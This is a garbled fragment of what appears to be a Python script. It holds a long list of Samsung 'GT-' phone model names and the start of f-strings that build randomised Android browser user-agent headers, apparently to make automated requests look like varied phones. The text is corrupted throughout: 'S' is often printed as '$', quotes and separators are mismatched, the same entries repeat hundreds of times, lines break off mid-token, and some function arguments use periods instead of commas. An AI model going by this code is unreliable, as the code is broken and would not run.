 S5233T",GT-s5233w,'GT-S5250',GT-S5253',GT-s5260',GT-S5280',GT-S5282',GT-S5283B',GT-S5292',GT-S5300',GT-S5300L',GT-S5301',GT-S5301B',GT-S5282',GT-S5283B',GT-S5292',GT-S5300',GT-S5300L',GT-S5301',GT-S5301B',GT-S5282',GT-S5283B',GT-S5283B',GT-S5283B',GT-S5283B',GT-S5280',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5300L',GT-S5500L',GT-S5500L',GT-S5500L',GT-S5500L',GT-S5500L',GT-S5500L',GT-S5500L',GT-S5500L',GT-S55
 $5301L',GT-$5302',GT-$5302B',GT-$5303',GT-$5303B',GT-$5310B',GT-$5310B',GT-$5310C',GT-$5310E',GT-$5310G',GT-$5310G',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5310B',GT-$5
  $5310M';GT-$5310N';GT-$5312';GT-$5312B';GT-$5312C';GT-$5312L';GT-$5330';GT-$5360';GT-$5360B';GT-$5360L';GT-$5360T';GT-$5363';GT-$5360B';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$5360C';GT-$536
 $5367',GT-$5369',GT-$5380D',GT-$5580D',GT-$55600',GT-$55600',GT-$5570B',GT-$5570B',GT-$5570L',GT-$5578',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT-$5600',GT
 S5610','GT-S5610K','GT-S5611','GT-S5620','GT-S5670','GT-S5670B','GT-S5670HKBZTA','GT-S5690','GT-S5690R','GT-S5830','GT-S5830D','GT-S5830G','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5830B','GT-S5850B','GT-S5850B','GT-S5850B','GT-S5850B','GT-S5850B','GT-S5850B','GT-S5850B','GT-S5850B','GT-S5850B'
  S5830I'.'GT-S5830L'.'GT-S5830M'.'GT-S5830T'.'GT-S5830V'.'GT-S5831I'.'GT-S5838'.'GT-S5839I'.'GT-S6010'.'GT-S6010BBABTU'.'GT-S6012'.'GT-S6012B'.'GT-S6012B'.
 $6102',GT-$6102B',GT-$6293T',GT-$6310B',GT-$6310ZWAMID',GT-$6312',GT-$6313T',GT-$6352',GT-$65000',GT-$6500D',GT-$6500L',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$6790',GT-$67
  S6790L',GT-S6790N',GT-S6792L',GT-S6800',GT-S6800HKAXFA',GT-S6802',GT-S6810D',GT-S6810B',GT-S6810E',GT-S6810L',GT-S6810M',GT-
 S6810MBASER',GT-S6810P',GT-S6812',GT-S6812B',GT-S6812C',GT-S6812i',GT-S6818',GT-S6818V',GT-S7230E',GT-S7233E',GT-S7250D',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7262',GT-S7
 $7270','GT-$7270L','GT-$7272C','GT-$7273T','GT-$7278T','GT-$7278U','GT-$7390C','GT-$7390L','GT-$7390L','GT-$7392L','GT-$7392L','GT-$7390L','GT-$7390C','GT-$7390C','GT-$7390L','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C','GT-$7390C'
 $7500ABABTU',GT-$7500ABADBT',GT-$7500ABTTLP',GT-$7500CWADBT',GT-$7500C',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$7560',GT-$
 $7562i',GT-$7566',GT-$7566',GT-$7568',GT-$7568',GT-$7572',GT-$7580E',GT-$7588T',GT-$758X',GT-$7592',GT-$7710',GT-$7710',GT-$7898',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$7680',GT-$76
  S7898I';GT-S8500';GT-S8530';GT-S8600';GT-STB919';GT-T140';GT-T150';GT-V8a';GT-V818';GT-VC818';GT-VM919S';GT-W131';GT-W153';GT-X831';GT-
 X853','GT-X870','GT-X890','GT-Y8750']
 ugen1 = f"Mozilla/5.0 (Linux; Android {str(rr(4,12))}; {str(rc(gt))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{str(rr(100,104))}.0.
  {str(rr(3900.4900))}.{str(rr(40.150))} Mobile Safari/537.36 {str(rc(aZ))}{str(rr(1.1000))}
 ugen2 = f"Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/{str(rc(build_nokiax))}) AppleWebKit/537.36 (KHTML, like Gecko)
